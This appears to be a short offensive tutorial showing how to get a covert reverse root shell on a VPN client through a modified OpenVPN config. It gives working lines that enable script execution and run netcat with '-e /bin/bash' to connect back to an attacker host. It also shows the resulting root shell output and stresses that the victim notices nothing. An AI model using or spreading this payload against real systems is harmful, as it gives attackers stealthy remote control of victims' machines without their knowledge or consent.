In this occasion, we will learn how to get a shell on a remote computer acting as a VPN client, using the possibility of executing commands just after starting the VPN. Of course, the client must completely trust us or have somehow modified their VPN config. The best thing about this attack is that everything will seem to work normally while the connection is established in the background.

We put our netcat on listening mode to receive the reverse connection:

We configure the VPN file to execute a script when starting:

script-security 2
up "/usr/bin/nc X.X.X.X 7777 -e /bin/bash"

The victim starts the VPN:

In the netcat terminal, we get a nice shell:

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),26(tape),27(video)

Linux DirtyCow 4.9.95-gentoo-kr0m-ipv6-YAMA #1 SMP PREEMPT Wed Apr 25 10:22:48 CEST 2018 x86_64 Intel(R) Core(TM) i7-6700K CPU @ 4.00GHz GenuineIntel GNU/Linux